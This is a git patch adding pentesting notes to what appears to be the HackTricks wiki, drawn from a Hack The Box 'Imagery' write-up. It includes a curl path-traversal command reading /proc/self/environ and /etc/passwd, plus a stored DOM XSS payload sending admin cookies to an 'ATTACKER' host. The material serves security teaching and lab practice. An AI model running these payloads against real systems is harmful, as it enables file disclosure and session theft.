From 2c5bd4563ccfbb135cab7106ee3a5042f025d067 Mon Sep 17 00:00:00 2001
From: HackTricks News Bot <bot@hacktricks.xyz>
Date: Sat, 24 Jan 2026 18:33:15 +0000
Subject: [PATCH] Add content from: HTB: Imagery

---
 src/pentesting-web/file-inclusion/README.md   | 14 ++++++++++++-
 .../xss-cross-site-scripting/dom-xss.md       | 20 +++++++++++++++++++
 2 files changed, 33 insertions(+), 1 deletion(-)

diff --git a/src/pentesting-web/file-inclusion/README.md b/src/pentesting-web/file-inclusion/README.md
index c6045bb956a..719bd0a628f 100644
--- a/src/pentesting-web/file-inclusion/README.md
+++ b/src/pentesting-web/file-inclusion/README.md
@@ -793,6 +793,18 @@ _Even if you cause a PHP Fatal Error, PHP temporary files uploaded are deleted._
 <figure><img src="../../images/image (1031).png" alt=""><figcaption></figcaption></figure>
 
 
+### Preserve traversal sequences from the client
+
+Some HTTP clients normalize or collapse `../` before the request reaches the server, breaking directory traversal payloads. Use `curl --path-as-is` to keep traversal untouched when abusing log/download endpoints that concatenate a user-controlled filename, and add `--ignore-content-length` for pseudo-files like `/proc`:
+
+```bash
+curl --path-as-is -b "session=$SESSION" \
+  "http://TARGET/admin/get_system_log?log_identifier=../../../../proc/self/environ" \
+  --ignore-content-length -s | tr '\000' '\n'
+```
+
+Tune the number of `../` segments until you escape the intended directory, then dump `/etc/passwd`, `/proc/self/cwd/app.py`, or other source/config files.
+
 ## References
 
 - [PayloadsAllTheThings](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/File%20Inclusion%20-%20Path%20Traversal)
@@ -803,9 +815,9 @@ _Even if you cause a PHP Fatal Error, PHP temporary files uploaded are deleted._
 - [Orange Tsai – Confusion Attacks on Apache](https://blog.orange.tw/posts/2024-08-confusion-attacks-en/)
 - [VTENEXT 25.02 – a three-way path to RCE](https://blog.sicuranext.com/vtenext-25-02-a-three-way-path-to-rce/)
 - [The Art of PHP: CTF‑born exploits and techniques](https://blog.orange.tw/posts/2025-08-the-art-of-php-ch/)
-
 - [When Audits Fail: Four Critical Pre-Auth Vulnerabilities in TRUfusion Enterprise](https://www.rcesecurity.com/2025/09/when-audits-fail-four-critical-pre-auth-vulnerabilities-in-trufusion-enterprise/)
 - [Positive Technologies – Blind Trust: What Is Hidden Behind the Process of Creating Your PDF File?](https://swarm.ptsecurity.com/blind-trust-what-is-hidden-behind-the-process-of-creating-your-pdf-file/)
+- [HTB: Imagery (admin log download traversal + `/proc/self/environ` read)](https://0xdf.gitlab.io/2026/01/24/htb-imagery.html)
 
 {{#file}}
 EN-Local-File-Inclusion-1.pdf
diff --git a/src/pentesting-web/xss-cross-site-scripting/dom-xss.md b/src/pentesting-web/xss-cross-site-scripting/dom-xss.md
index 1d19e2889c5..3aced30d005 100644
--- a/src/pentesting-web/xss-cross-site-scripting/dom-xss.md
+++ b/src/pentesting-web/xss-cross-site-scripting/dom-xss.md
@@ -354,9 +354,29 @@ fetch('https://webhook.site/<id>?flag=' + encodeURIComponent(localStorage.getIte
 
 If the bot does not restrict schemes, supplying a `javascript:` URL (`javascript:fetch(...)`) executes in the current origin without new navigation, directly leaking storage values.
 
+## Template literal `innerHTML` + partial sanitization gaps
+
+Frontends that sanitize only selected fields but still interpolate an untrusted one directly into `innerHTML` are trivially exploitable. Example:
+
+```javascript
+fetch(`${window.location.origin}/admin/bug_reports`).then(r => r.json()).then(reports => {
+  reports.forEach(report => {
+    reportCard.innerHTML = `
+      <div>${DOMPurify.sanitize(report.id)}</div>
+      <div>${report.details}</div> <!-- unsanitized sink -->
+    `;
+  });
+});
+```
+
+If the un-sanitized field is stored server-side (e.g., bug report “details”), the payload becomes **stored DOM XSS** for any privileged viewer of the list. A simple payload such as `<img src=x onerror=fetch('http://ATTACKER/?c='+document.cookie)>` executes when an admin opens the page and exfiltrates their cookies.
+
+When the app explicitly disables `SESSION_COOKIE_HTTPONLY` (e.g., Flask `app.config['SESSION_COOKIE_HTTPONLY'] = False`), the stolen cookie immediately grants the admin session even if the signing secret rotates on each boot (random `secret_key` prevents forging, but theft still works).
+
 ## References
 
 - [Flagvent 2025 (Medium) — pink, Santa’s Wishlist, Christmas Metadata, Captured Noise](https://0xdf.gitlab.io/flagvent2025/medium)
+- [HTB: Imagery (stored DOM XSS via partial DOMPurify + session theft)](https://0xdf.gitlab.io/2026/01/24/htb-imagery.html)
 
 {{#include ../../banners/hacktricks-training.md}}